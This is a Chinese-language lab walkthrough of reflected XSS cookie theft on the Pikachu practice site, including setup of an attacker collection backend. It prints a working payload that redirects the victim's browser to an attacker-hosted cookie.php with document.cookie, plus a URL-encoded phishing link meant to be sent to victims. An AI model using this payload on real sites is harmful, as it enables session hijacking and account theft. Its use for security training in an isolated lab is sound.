2.5 xss(get)获取cookie信息

cookie获取及xss后台 原理

准备环境 主机网站Window server 2016搭建pikachuWindow 10正常的客户Window server 2008攻击者搭建的xss后台

环境搭建 第一步 在数据库中创建pkxss数据库

第二步 初始化网站

第三步 初始化成功

第四步 成功访问网站

第五步 登录查看网站信息

http://192.168.232.129/pkxss/xcookie/pkxss_cookie_result.php

案例演示 第一步 在输入非正常的链接

第二步 提交带有攻击方信息的恶意链接

document.location = 'http://192.168.232.129/pkxss/xcookie/cookie.php?cookie=' +document. cookie;

第三步 查看攻击方网站获取的cookie信息

第四步 将恶意链接保存，可诱导客户进行点击

http://192.168.1.232.129/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2F192.168.232.129%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2Bdocument.+cookie%3B%3C%2Fscript%3E&submit=submit

第五步 代码审计

Cookie.php 用于记录信息，并存入数据库

Pkxss_cookie_result.php 首界面，用户查询数据库的信息，并回显到界面

Pkxss_cookie_result.php 源代码

cookie搜集结果




pikachu Xss 获取cookies结果
返回首页



    
        id
        time
        ipaddress
        cookie
        referer
        useragent
        删除
    
    
    

Cookie.php源代码

摘抄 这世上肯定某个角落， 存在着能完全领会我想表达的意思的人。 —村上村树